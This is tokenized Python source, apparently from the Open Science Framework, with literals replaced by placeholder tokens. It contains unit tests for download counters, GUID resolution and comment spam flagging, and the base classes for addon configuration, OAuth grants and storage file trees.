'<STR_LIT>' . format ( self . node , self . fid , self . vid ) <EOL> session . data [ '<STR_LIT>' ] . append ( page ) <EOL> download_file_version_ ( node = self . node , fid = self . fid , vid = self . vid ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid , self . vid ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_get_basic_counters ( self ) : <EOL> page = '<STR_LIT>' + str ( self . node . _id ) <EOL> d = { '<STR_LIT>' : { } } <EOL> d [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:5> <EOL> d [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:3> <EOL> collection = self . db [ '<STR_LIT>' ] <EOL> collection . update ( { '<STR_LIT>' : page } , d , True , False ) <EOL> count = analytics . get_basic_counters ( page , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:3> , <NUM_LIT:5> ) ) <EOL> @ unittest . skip ( '<STR_LIT>' ) <EOL> def test_update_counters_different_files ( self ) : <EOL> @ analytics . update_counters ( '<STR_LIT>' , db = self . db ) <EOL> def download_file_ ( ** kwargs ) : <EOL> return kwargs . get ( '<STR_LIT>' ) or kwargs . get ( '<STR_LIT>' ) <EOL> fid1 = '<STR_LIT>' <EOL> fid2 = '<STR_LIT>' <EOL> download_file_ ( node = self . node , fid = fid1 ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , fid1 ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , fid2 ) , db = self . db ) <EOL> assert_equal ( count , ( None , None ) ) <EOL> page = '<STR_LIT>' . format ( self . node , fid1 ) <EOL> session . data [ '<STR_LIT>' ] . append ( page ) <EOL> download_file_ ( node = self . node , fid = fid1 ) <EOL> download_file_ ( node = self . node , fid = fid2 ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , fid1 ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , fid2 ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) </s>
<s> import mock <EOL> from nose . tools import * <EOL> from tests . base import OsfTestCase <EOL> from tests . factories import NodeFactory <EOL> from modularodm import Q <EOL> from modularodm import fields <EOL> from modularodm . storage . mongostorage import MongoStorage <EOL> from framework . mongo import database <EOL> from framework . guid . model import GuidStoredObject <EOL> from website import models <EOL> class TestGuidStoredObject ( OsfTestCase ) : <EOL> def test_guid_stored_object ( self ) : <EOL> class FakeSchema ( GuidStoredObject ) : <EOL> _id = fields . StringField ( ) <EOL> @ property <EOL> def deep_url ( self ) : <EOL> return '<STR_LIT>' <EOL> FakeSchema . set_storage ( MongoStorage ( database , '<STR_LIT>' ) ) <EOL> fake_guid = FakeSchema ( _id = '<STR_LIT>' ) <EOL> fake_guid . save ( ) <EOL> guids = models . Guid . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> assert_equal ( guids . count ( ) , <NUM_LIT:1> ) <EOL> assert_equal ( guids [ <NUM_LIT:0> ] . referent , fake_guid ) <EOL> assert_equal ( guids [ <NUM_LIT:0> ] . _id , fake_guid . _id ) <EOL> class TestResolveGuid ( OsfTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestResolveGuid , self ) . setUp ( ) <EOL> self . node = NodeFactory ( ) <EOL> def test_resolve_guid ( self ) : <EOL> res_guid = self . app . get ( self . node . web_url_for ( '<STR_LIT>' , _guid = True ) , auth = self . node . creator . auth ) <EOL> res_full = self . app . get ( self . node . web_url_for ( '<STR_LIT>' ) , auth = self . node . creator . auth ) <EOL> assert_equal ( res_guid . text , res_full . text ) <EOL> def test_resolve_guid_no_referent ( self ) : <EOL> guid = models . Guid . load ( self . node . _id ) <EOL> guid . referent = None <EOL> guid . save ( ) <EOL> res = self . app . get ( <EOL> self . node . web_url_for ( '<STR_LIT>' , _guid = True ) , <EOL> auth = self . node . creator . auth , <EOL> expect_errors = True , <EOL> ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' , None ) <EOL> def test_resolve_guid_no_url ( self ) : <EOL> res = self . app . get ( <EOL> self . node . web_url_for ( '<STR_LIT>' , _guid = True ) , <EOL> auth = self . node . creator . auth , <EOL> expect_errors = True , <EOL> ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) </s>
<s> from __future__ import absolute_import <EOL> from datetime import datetime <EOL> from nose . tools import * <EOL> from modularodm . exceptions import ValidationValueError , ValidationTypeError <EOL> from framework . auth import Auth <EOL> from tests . base import OsfTestCase <EOL> from tests . factories import UserFactory , CommentFactory <EOL> class TestSpamMixin ( OsfTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestSpamMixin , self ) . setUp ( ) <EOL> self . comment = CommentFactory ( ) <EOL> self . auth = Auth ( user = self . comment . user ) <EOL> def test_report_abuse ( self ) : <EOL> user = UserFactory ( ) <EOL> time = datetime . utcnow ( ) <EOL> self . comment . report_abuse ( <EOL> user , date = time , category = '<STR_LIT>' , text = '<STR_LIT>' , save = True ) <EOL> assert_equal ( self . comment . spam_status , self . comment . FLAGGED ) <EOL> equivalent = dict ( <EOL> date = time , <EOL> category = '<STR_LIT>' , <EOL> text = '<STR_LIT>' , <EOL> retracted = False <EOL> ) <EOL> assert_in ( user . _id , self . comment . reports ) <EOL> assert_equal ( self . comment . reports [ user . _id ] , equivalent ) <EOL> def test_report_abuse_own_comment ( self ) : <EOL> with assert_raises ( ValueError ) : <EOL> self . comment . report_abuse ( <EOL> self . comment . user , <EOL> category = '<STR_LIT>' , text = '<STR_LIT>' , <EOL> save = True <EOL> ) <EOL> assert_equal ( self . comment . spam_status , self . comment . UNKNOWN ) <EOL> def test_retract_report ( self ) : <EOL> user = UserFactory ( ) <EOL> time = datetime . utcnow ( ) <EOL> self . comment . report_abuse ( <EOL> user , date = time , category = '<STR_LIT>' , text = '<STR_LIT>' , save = True <EOL> ) <EOL> assert_equal ( self . comment . spam_status , self . comment . FLAGGED ) <EOL> self . comment . retract_report ( user , save = True ) <EOL> assert_equal ( self . comment . spam_status , self . comment . UNKNOWN ) <EOL> equivalent = { <EOL> '<STR_LIT:date>' : time , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> assert_in ( user . _id , self . comment . reports ) <EOL> assert_equal ( self . comment . reports [ user . _id ] , equivalent ) <EOL> def test_retract_report_not_reporter ( self ) : <EOL> reporter = UserFactory ( ) <EOL> non_reporter = UserFactory ( ) <EOL> self . comment . report_abuse ( <EOL> reporter , category = '<STR_LIT>' , text = '<STR_LIT>' , save = True <EOL> ) <EOL> with assert_raises ( ValueError ) : <EOL> self . comment . retract_report ( non_reporter , save = True ) <EOL> assert_equal ( self . comment . spam_status , self . comment . FLAGGED ) <EOL> def test_retract_one_report_of_many ( self ) : <EOL> user_1 = UserFactory ( ) <EOL> user_2 = UserFactory ( ) <EOL> time = datetime . utcnow ( ) <EOL> self . comment . report_abuse ( <EOL> user_1 , date = time , category = '<STR_LIT>' , text = '<STR_LIT>' , save = True <EOL> ) <EOL> assert_equal ( self . comment . spam_status , self . comment . FLAGGED ) <EOL> self . comment . report_abuse ( <EOL> user_2 , date = time , category = '<STR_LIT>' , text = '<STR_LIT:all>' , save = True <EOL> ) <EOL> self . comment . retract_report ( user_1 , save = True ) <EOL> equivalent = { <EOL> '<STR_LIT:date>' : time , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> assert_in ( user_1 . _id , self . comment . reports ) <EOL> assert_equal ( self . comment . reports [ user_1 . _id ] , equivalent ) <EOL> assert_equal ( self . comment . spam_status , self . comment . FLAGGED ) <EOL> def test_flag_spam ( self ) : <EOL> self . comment . flag_spam ( save = True ) <EOL> assert_equal ( self . comment . spam_status , self . comment . FLAGGED ) <EOL> def test_cannot_remove_flag_not_retracted ( self ) : <EOL> user = UserFactory ( ) <EOL> self . comment . report_abuse ( <EOL> user , category = '<STR_LIT>' , text = '<STR_LIT>' , save = True <EOL> ) <EOL> self . comment . remove_flag ( save = True ) <EOL> assert_equal ( self . comment . spam_status , self . comment . FLAGGED ) <EOL> def test_remove_flag ( self ) : <EOL> self . comment . flag_spam ( save = True ) <EOL> assert_equal ( self . comment . spam_status , self . comment . FLAGGED ) <EOL> self . comment . remove_flag ( save = True ) <EOL> assert_equal ( self . comment . spam_status , self . comment . UNKNOWN ) <EOL> def test_confirm_ham ( self ) : <EOL> self . comment . confirm_ham ( save = True ) <EOL> assert_equal ( self . comment . spam_status , self . comment . HAM ) <EOL> def test_confirm_spam ( self ) : <EOL> self . comment . confirm_spam ( save = True ) <EOL> assert_equal ( self . comment . spam_status , self . comment . SPAM ) <EOL> def test_validate_reports_bad_key ( self ) : <EOL> self . comment . reports [ None ] = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:text>' : '<STR_LIT>' } <EOL> with assert_raises ( ValidationValueError ) : <EOL> self . comment . save ( ) <EOL> def test_validate_reports_bad_type ( self ) : <EOL> self . comment . reports [ self . comment . user . _id ] = '<STR_LIT>' <EOL> with assert_raises ( ValidationTypeError ) : <EOL> self . comment . save ( ) <EOL> def test_validate_reports_bad_value ( self ) : <EOL> self . comment . reports [ self . comment . user . _id ] = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> with assert_raises ( ValidationValueError ) : <EOL> self . comment . save ( ) </s>
<s> import glob <EOL> import importlib <EOL> import mimetypes <EOL> import os <EOL> from time import sleep <EOL> from bson import ObjectId <EOL> from mako . lookup import TemplateLookup <EOL> import markupsafe <EOL> import requests <EOL> from modularodm import fields <EOL> from modularodm import Q <EOL> from framework . auth import Auth <EOL> from framework . auth . decorators import must_be_logged_in <EOL> from framework . exceptions import ( <EOL> PermissionsError , <EOL> HTTPError , <EOL> ) <EOL> from framework . mongo import StoredObject <EOL> from framework . routing import process_rules <EOL> from website import settings <EOL> from website . addons . base import serializer , logger <EOL> from website . project . model import Node , User <EOL> from website . util import waterbutler_url_for <EOL> from website . oauth . signals import oauth_complete <EOL> NODE_SETTINGS_TEMPLATE_DEFAULT = os . path . join ( <EOL> settings . TEMPLATES_PATH , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> USER_SETTINGS_TEMPLATE_DEFAULT = os . path . join ( <EOL> settings . TEMPLATES_PATH , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> lookup = TemplateLookup ( <EOL> directories = [ <EOL> settings . TEMPLATES_PATH <EOL> ] , <EOL> default_filters = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:h>' , <EOL> ] , <EOL> imports = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> def _is_image ( filename ) : <EOL> mtype , _ = mimetypes . guess_type ( filename ) <EOL> return mtype and mtype . startswith ( '<STR_LIT:image>' ) <EOL> class AddonConfig ( object ) : <EOL> def __init__ ( self , short_name , full_name , owners , categories , <EOL> added_default = None , added_mandatory = None , <EOL> node_settings_model = None , user_settings_model = None , include_js = None , include_css = None , <EOL> widget_help = None , views = None , configs = None , models = None , <EOL> has_hgrid_files = False , get_hgrid_data = None , max_file_size = None , high_max_file_size = None , <EOL> accept_extensions = True , <EOL> node_settings_template = None , user_settings_template = None , <EOL> ** kwargs ) : <EOL> self . models = models <EOL> self . settings_models = { } <EOL> if node_settings_model : <EOL> node_settings_model . config = self <EOL> self . settings_models [ '<STR_LIT>' ] = node_settings_model <EOL> if user_settings_model : <EOL> user_settings_model . config = self <EOL> self . settings_models [ '<STR_LIT:user>' ] = user_settings_model <EOL> self . short_name = short_name <EOL> self . full_name = full_name <EOL> self . owners = owners <EOL> self . categories = categories <EOL> self . added_default = added_default or [ ] <EOL> self . added_mandatory = added_mandatory or [ ] <EOL> if set ( self . added_mandatory ) . difference ( self . added_default ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . include_js = self . _include_to_static ( include_js or { } ) <EOL> self . include_css = self . _include_to_static ( include_css or { } ) <EOL> self . widget_help = widget_help <EOL> self . views = views or [ ] <EOL> self . configs = configs or [ ] <EOL> self . has_hgrid_files = has_hgrid_files <EOL> self . get_hgrid_data = get_hgrid_data <EOL> self . max_file_size = max_file_size <EOL> self . high_max_file_size = high_max_file_size <EOL> self . accept_extensions = accept_extensions <EOL> self . user_settings_template = user_settings_template <EOL> if not user_settings_template or not os . path . exists ( os . path . dirname ( user_settings_template ) ) : <EOL> self . user_settings_template = USER_SETTINGS_TEMPLATE_DEFAULT <EOL> self . node_settings_template = node_settings_template <EOL> if not node_settings_template or not os . path . exists ( os . path . dirname ( node_settings_template ) ) : <EOL> self . node_settings_template = NODE_SETTINGS_TEMPLATE_DEFAULT <EOL> template_dirs = list ( <EOL> set ( <EOL> [ <EOL> path <EOL> for path in [ os . path . dirname ( self . user_settings_template ) , os . path . dirname ( self . node_settings_template ) , settings . TEMPLATES_PATH ] <EOL> if os . path . exists ( path ) <EOL> ] <EOL> ) <EOL> ) <EOL> if template_dirs : <EOL> self . template_lookup = TemplateLookup ( <EOL> directories = template_dirs , <EOL> default_filters = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:h>' , <EOL> ] , <EOL> imports = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> else : <EOL> self . template_lookup = None <EOL> def _static_url ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> if filename . startswith ( '<STR_LIT:/>' ) : <EOL> return filename <EOL> return '<STR_LIT>' . format ( <EOL> addon = self . short_name , <EOL> filename = filename , <EOL> ) <EOL> def _include_to_static ( self , include ) : <EOL> """<STR_LIT:U+0020>""" <EOL> return { <EOL> key : [ <EOL> self . _static_url ( item ) <EOL> for item in value <EOL> ] <EOL> for key , value in include . iteritems ( ) <EOL> } <EOL> @ property <EOL> def icon ( self ) : <EOL> try : <EOL> return self . _icon <EOL> except : <EOL> static_path = os . path . join ( '<STR_LIT>' , '<STR_LIT>' , self . short_name , '<STR_LIT>' ) <EOL> static_files = glob . glob ( os . path . join ( static_path , '<STR_LIT>' ) ) <EOL> image_files = [ <EOL> os . path . split ( filename ) [ <NUM_LIT:1> ] <EOL> for filename in static_files <EOL> if _is_image ( filename ) <EOL> ] <EOL> if len ( image_files ) == <NUM_LIT:1> : <EOL> self . _icon = image_files [ <NUM_LIT:0> ] <EOL> else : <EOL> self . _icon = None <EOL> return self . _icon <EOL> @ property <EOL> def icon_url ( self ) : <EOL> return self . _static_url ( self . icon ) if self . icon else None <EOL> def to_json ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . short_name , <EOL> '<STR_LIT>' : self . full_name , <EOL> '<STR_LIT>' : self . short_name in settings . ADDON_CAPABILITIES , <EOL> '<STR_LIT>' : settings . ADDON_CAPABILITIES . get ( self . short_name ) , <EOL> '<STR_LIT>' : self . icon_url , <EOL> '<STR_LIT>' : '<STR_LIT>' in self . views , <EOL> '<STR_LIT>' : '<STR_LIT>' in self . views , <EOL> } <EOL> @ property <EOL> def path ( self ) : <EOL> return os . path . join ( settings . BASE_PATH , self . short_name ) <EOL> class AddonSettingsBase ( StoredObject ) : <EOL> _id = fields . StringField ( default = lambda : str ( ObjectId ( ) ) ) <EOL> deleted = fields . BooleanField ( default = False ) <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> def delete ( self , save = True ) : <EOL> self . deleted = True <EOL> self . on_delete ( ) <EOL> if save : <EOL> self . save ( ) <EOL> def undelete ( self , save = True ) : <EOL> self . deleted = False <EOL> self . on_add ( ) <EOL> if save : <EOL> self . save ( ) <EOL> def to_json ( self , user ) : <EOL> return { <EOL> '<STR_LIT>' : self . config . short_name , <EOL> '<STR_LIT>' : self . config . full_name , <EOL> } <EOL> def on_add ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def on_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AddonUserSettingsBase ( AddonSettingsBase ) : <EOL> owner = fields . ForeignField ( '<STR_LIT:user>' , index = True ) <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> def __repr__ ( self ) : <EOL> if self . owner : <EOL> return '<STR_LIT>' . format ( cls = self . __class__ . __name__ , uid = self . owner . _id ) <EOL> else : <EOL> return '<STR_LIT>' . format ( cls = self . __class__ . __name__ ) <EOL> @ property <EOL> def public_id ( self ) : <EOL> return None <EOL> @ property <EOL> def has_auth ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> @ property <EOL> def nodes_authorized ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> schema = self . config . settings_models [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> return [ ] <EOL> return [ <EOL> node_addon . owner <EOL> for node_addon in schema . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , self ) ) <EOL> if node_addon . owner and not node_addon . owner . is_deleted <EOL> ] <EOL> @ property <EOL> def can_be_merged ( self ) : <EOL> return hasattr ( self , '<STR_LIT>' ) <EOL> def to_json ( self , user ) : <EOL> ret = super ( AddonUserSettingsBase , self ) . to_json ( user ) <EOL> ret [ '<STR_LIT>' ] = self . has_auth <EOL> ret . update ( { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : node . _id , <EOL> '<STR_LIT:url>' : node . url , <EOL> '<STR_LIT:title>' : node . title , <EOL> '<STR_LIT>' : node . is_registration , <EOL> '<STR_LIT>' : node . api_url <EOL> } <EOL> for node in self . nodes_authorized <EOL> ] <EOL> } ) <EOL> return ret <EOL> @ oauth_complete . connect <EOL> def oauth_complete ( provider , account , user ) : <EOL> if not user or not account : <EOL> return <EOL> user . add_addon ( account . provider ) <EOL> user . save ( ) <EOL> class AddonOAuthUserSettingsBase ( AddonUserSettingsBase ) : <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> oauth_grants = fields . DictionaryField ( ) <EOL> oauth_provider = None <EOL> serializer = serializer . OAuthAddonSerializer <EOL> @ property <EOL> def has_auth ( self ) : <EOL> return bool ( self . external_accounts ) <EOL> @ property <EOL> def external_accounts ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> x for x in self . owner . external_accounts <EOL> if x . provider == self . oauth_provider . short_name <EOL> ] <EOL> def delete ( self , save = True ) : <EOL> for account in self . external_accounts : <EOL> self . revoke_oauth_access ( account , save = False ) <EOL> super ( AddonOAuthUserSettingsBase , self ) . delete ( save = save ) <EOL> def grant_oauth_access ( self , node , external_account , metadata = None ) : <EOL> """<STR_LIT>""" <EOL> if external_account not in self . owner . external_accounts : <EOL> raise PermissionsError ( ) <EOL> metadata = metadata or { } <EOL> if node . _id not in self . oauth_grants : <EOL> self . oauth_grants [ node . _id ] = { } <EOL> if external_account . _id not in self . oauth_grants [ node . _id ] : <EOL> self . oauth_grants [ node . _id ] [ external_account . _id ] = { } <EOL> for key , value in metadata . iteritems ( ) : <EOL> self . oauth_grants [ node . _id ] [ external_account . _id ] [ key ] = value <EOL> self . save ( ) <EOL> @ must_be_logged_in <EOL> def revoke_oauth_access ( self , external_account , auth , save = True ) : <EOL> """<STR_LIT>""" <EOL> for node in self . get_nodes_with_oauth_grants ( external_account ) : <EOL> try : <EOL> addon_settings = node . get_addon ( external_account . provider , deleted = True ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> addon_settings . deauthorize ( auth = auth ) <EOL> if User . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , external_account . _id ) ) . count ( ) == <NUM_LIT:1> : <EOL> self . revoke_remote_oauth_access ( external_account ) <EOL> for key in self . oauth_grants : <EOL> self . oauth_grants [ key ] . pop ( external_account . _id , None ) <EOL> if save : <EOL> self . save ( ) <EOL> def revoke_remote_oauth_access ( self , external_account ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def verify_oauth_access ( self , node , external_account , metadata = None ) : <EOL> """<STR_LIT>""" <EOL> metadata = metadata or { } <EOL> try : <EOL> grants = self . oauth_grants [ node . _id ] [ external_account . _id ] <EOL> except KeyError : <EOL> return False <EOL> for key , value in metadata . iteritems ( ) : <EOL> if key not in grants or grants [ key ] != value : <EOL> return False <EOL> return True <EOL> def get_nodes_with_oauth_grants ( self , external_account ) : <EOL> for node_id , grants in self . oauth_grants . iteritems ( ) : <EOL> node = Node . load ( node_id ) <EOL> if external_account . _id in grants . keys ( ) and not node . is_deleted : <EOL> yield node <EOL> def get_attached_nodes ( self , external_account ) : <EOL> for node in self . get_nodes_with_oauth_grants ( external_account ) : <EOL> if node is None : <EOL> continue <EOL> node_settings = node . get_addon ( self . oauth_provider . short_name ) <EOL> if node_settings is None : <EOL> continue <EOL> if node_settings . external_account == external_account : <EOL> yield node <EOL> def merge ( self , user_settings ) : <EOL> """<STR_LIT>""" <EOL> if user_settings . __class__ is not self . __class__ : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> for node_id , data in user_settings . oauth_grants . iteritems ( ) : <EOL> if node_id not in self . oauth_grants : <EOL> self . oauth_grants [ node_id ] = data <EOL> else : <EOL> node_grants = user_settings . oauth_grants [ node_id ] . iteritems ( ) <EOL> for ext_acct , meta in node_grants : <EOL> if ext_acct not in self . oauth_grants [ node_id ] : <EOL> self . oauth_grants [ node_id ] [ ext_acct ] = meta <EOL> else : <EOL> for k , v in meta : <EOL> if k not in self . oauth_grants [ node_id ] [ ext_acct ] : <EOL> self . oauth_grants [ node_id ] [ ext_acct ] [ k ] = v <EOL> user_settings . oauth_grants = { } <EOL> user_settings . save ( ) <EOL> try : <EOL> config = settings . ADDONS_AVAILABLE_DICT [ <EOL> self . oauth_provider . short_name <EOL> ] <EOL> Model = config . settings_models [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> connected = Model . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , user_settings ) ) <EOL> for node_settings in connected : <EOL> node_settings . user_settings = self <EOL> node_settings . save ( ) <EOL> self . save ( ) <EOL> def to_json ( self , user ) : <EOL> ret = super ( AddonOAuthUserSettingsBase , self ) . to_json ( user ) <EOL> ret [ '<STR_LIT>' ] = self . serializer ( <EOL> user_settings = self <EOL> ) . serialized_accounts <EOL> return ret <EOL> def on_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( AddonOAuthUserSettingsBase , self ) . on_delete ( ) <EOL> nodes = [ Node . load ( node_id ) for node_id in self . oauth_grants . keys ( ) ] <EOL> for node in nodes : <EOL> node_addon = node . get_addon ( self . oauth_provider . short_name ) <EOL> if node_addon and node_addon . user_settings == self : <EOL> node_addon . clear_auth ( ) <EOL> class AddonNodeSettingsBase ( AddonSettingsBase ) : <EOL> owner = fields . ForeignField ( '<STR_LIT>' , index = True ) <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> @ property <EOL> def complete ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ property <EOL> def configured ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . complete <EOL> @ property <EOL> def has_auth ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def to_json ( self , user ) : <EOL> ret = super ( AddonNodeSettingsBase , self ) . to_json ( user ) <EOL> ret . update ( { <EOL> '<STR_LIT:user>' : { <EOL> '<STR_LIT>' : self . owner . get_permissions ( user ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : self . owner . _id , <EOL> '<STR_LIT>' : self . owner . api_url , <EOL> '<STR_LIT:url>' : self . owner . url , <EOL> '<STR_LIT>' : self . owner . is_registration , <EOL> } , <EOL> '<STR_LIT>' : os . path . basename ( self . config . node_settings_template ) , <EOL> } ) <EOL> return ret <EOL> def render_config_error ( self , data ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template = lookup . get_template ( '<STR_LIT>' ) <EOL> return template . get_def ( '<STR_LIT>' ) . render ( <EOL> title = self . config . full_name , <EOL> name = self . config . short_name , <EOL> ** data <EOL> ) <EOL> def before_page_load ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def before_remove_contributor ( self , node , removed ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def after_remove_contributor ( self , node , removed , auth = None ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def before_make_public ( self , node ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def before_make_private ( self , node ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def after_set_privacy ( self , node , permissions ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def before_fork ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , "<STR_LIT>" ) : <EOL> if self . user_settings is None : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . project_or_component , <EOL> ) <EOL> elif self . user_settings and self . user_settings . owner == user : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . project_or_component , <EOL> ) <EOL> else : <EOL> return ( <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> ) . format ( <EOL> addon = self . config . full_name , <EOL> category = node . project_or_component , <EOL> ) <EOL> def after_fork ( self , node , fork , user , save = True ) : <EOL> """<STR_LIT>""" <EOL> clone = self . clone ( ) <EOL> clone . owner = fork <EOL> if save : <EOL> clone . save ( ) <EOL> return clone , None <EOL> def before_register ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def after_register ( self , node , registration , user , save = True ) : <EOL> """<STR_LIT>""" <EOL> return None , None <EOL> def after_delete ( self , node , user ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class GenericRootNode ( object ) : <EOL> path = '<STR_LIT:/>' <EOL> name = '<STR_LIT>' <EOL> class StorageAddonBase ( object ) : <EOL> """<STR_LIT>""" <EOL> root_node = GenericRootNode ( ) <EOL> @ property <EOL> def archive_folder_name ( self ) : <EOL> name = "<STR_LIT>" . format ( addon = self . config . full_name ) <EOL> folder_name = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) . lstrip ( '<STR_LIT:/>' ) . strip ( ) <EOL> if folder_name : <EOL> name = name + "<STR_LIT>" . format ( folder = folder_name ) <EOL> return name <EOL> def _get_fileobj_child_metadata ( self , filenode , user , cookie = None , version = None ) : <EOL> kwargs = dict ( <EOL> provider = self . config . short_name , <EOL> path = filenode . get ( '<STR_LIT:path>' , '<STR_LIT>' ) , <EOL> node = self . owner , <EOL> user = user , <EOL> view_only = True , <EOL> ) <EOL> if cookie : <EOL> kwargs [ '<STR_LIT>' ] = cookie <EOL> if version : <EOL> kwargs [ '<STR_LIT:version>' ] = version <EOL> metadata_url = waterbutler_url_for ( <EOL> '<STR_LIT>' , <EOL> ** kwargs <EOL> ) <EOL> res = requests . get ( metadata_url ) <EOL> if res . status_code != <NUM_LIT:200> : <EOL> raise HTTPError ( res . status_code , data = { <EOL> '<STR_LIT:error>' : res . json ( ) , <EOL> } ) <EOL> sleep ( <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> return res . json ( ) . get ( '<STR_LIT:data>' , [ ] ) <EOL> def _get_file_tree ( self , filenode = None , user = None , cookie = None , version = None ) : <EOL> """<STR_LIT>""" <EOL> filenode = filenode or { <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : self . root_node . name , <EOL> } <EOL> if filenode . get ( '<STR_LIT>' ) == '<STR_LIT:file>' : <EOL> return filenode <EOL> elif '<STR_LIT:size>' in filenode : <EOL> return filenode <EOL> kwargs = { <EOL> '<STR_LIT:version>' : version , <EOL> '<STR_LIT>' : cookie , <EOL> } <EOL> filenode [ '<STR_LIT>' ] = [ <EOL> self . _get_file_tree ( child , user , cookie = cookie ) <EOL> for child in self . _get_fileobj_child_metadata ( filenode , user , ** kwargs ) <EOL> ] <EOL> return filenode <EOL> class AddonOAuthNodeSettingsBase ( AddonNodeSettingsBase ) : <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> external_account = fields . ForeignField ( '<STR_LIT>' ) <EOL> user_settings = fields . AbstractForeignField ( ) <EOL> oauth_provider = None <EOL> @ property <EOL> def folder_id ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> @ property <EOL> def folder_name ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> @ property <EOL> def folder_path ( self ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> ) <EOL> @ property <EOL> def nodelogger ( self ) : <EOL> auth = None <EOL> if self . user_settings : <EOL> auth = Auth ( self . user_settings . owner ) <EOL> self . _logger_class = getattr ( <EOL> self , <EOL> '<STR_LIT>' , <EOL> type ( <EOL> '<STR_LIT>' . format ( self . config . short_name . capitalize ( ) ) , <EOL> ( logger . AddonNodeLogger , ) , <EOL> { '<STR_LIT>' : self . config . short_name } <EOL> ) <EOL> ) <EOL> 